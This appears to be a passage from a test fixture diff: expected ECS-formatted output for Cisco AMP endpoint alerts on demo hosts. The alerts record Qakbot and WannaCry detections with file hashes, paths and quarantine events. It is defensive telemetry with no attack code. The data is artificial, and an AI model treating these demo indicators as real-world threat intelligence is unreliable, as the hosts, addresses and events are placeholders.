+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T14:09:00.000Z",
+                "action": "Cloud IOC",
+                "id": "1493058569636000800",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.Qakbot.ioc",
+                        "description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:46:00.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094061712Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6264772016730014000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "detection_id": "6264772016730013699",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:46:00.000Z",
+            "file": {
+                "name": "report.pdf.exe",
+                "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe",
+                "hash": {
+                    "sha1": "5058b16a86beee96927371210b9a9f682976a50a",
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b",
+                    "md5": "48a0bf05b9706a00d2a0ff6260412f11"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b",
+                    "48a0bf05b9706a00d2a0ff6260412f11",
+                    "5058b16a86beee96927371210b9a9f682976a50a"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094063595Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6264772016730014000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D5221F6847-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6264772016730013699",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:45:59.000Z",
+            "file": {
+                "name": "Unconfirmed 762952.crdownload",
+                "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload",
+                "hash": {
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094065501Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6264772012435046000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D5221F6847-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6264772012435046402",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094067388Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419214500913742000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419214500913741862",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094069286Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741862",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 5580,
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094071156Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741859",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094073050Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419214500913742000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419214500913741858",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T13:43:32.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
